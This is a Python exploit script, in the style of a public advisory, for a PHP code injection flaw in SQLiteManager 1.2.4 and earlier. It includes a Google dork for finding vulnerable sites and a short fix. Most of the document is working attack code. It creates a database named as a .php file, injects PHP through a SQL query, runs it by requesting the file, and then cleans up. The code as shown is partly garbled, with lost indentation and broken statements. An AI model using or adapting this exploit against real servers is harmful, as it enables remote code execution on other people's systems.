#!/usr/bin/env python
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
Vulnerable Softwares:
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
''' and None
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
def getDbId(sqliteUrl, myDbName):
#Find Components
htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td:
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
def main():
print \
'SQLiteManager Exploit\n' + \
'Made By RealGame\n' + \
if len(argv) < 2:
#replace('\\', '/') - To Do The Same In Win And Linux
filename = argv[0].replace('\\', '/').split('/')[-1]
print 'Execute Example: ' + filename + '\n'
sqliteUrl = argv[1]
myDbName= "phpinfo"
myDbFile= "phpinfo.php"
#Create Database
params = {'dbname': myDbName,
'dbVersion' : '2',
'dbRealpath': None,
'dbpath': myDbFile,
'action': 'saveDb'}
urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
#Get Database ID
dbId = getDbId(sqliteUrl + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery': 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
'sqlFile' : None,
'action': 'sql',
'sqltype' : '1'}
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Inject Code
urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
print 'Succeed'
print 'Failed'
if __name__ == '__main__':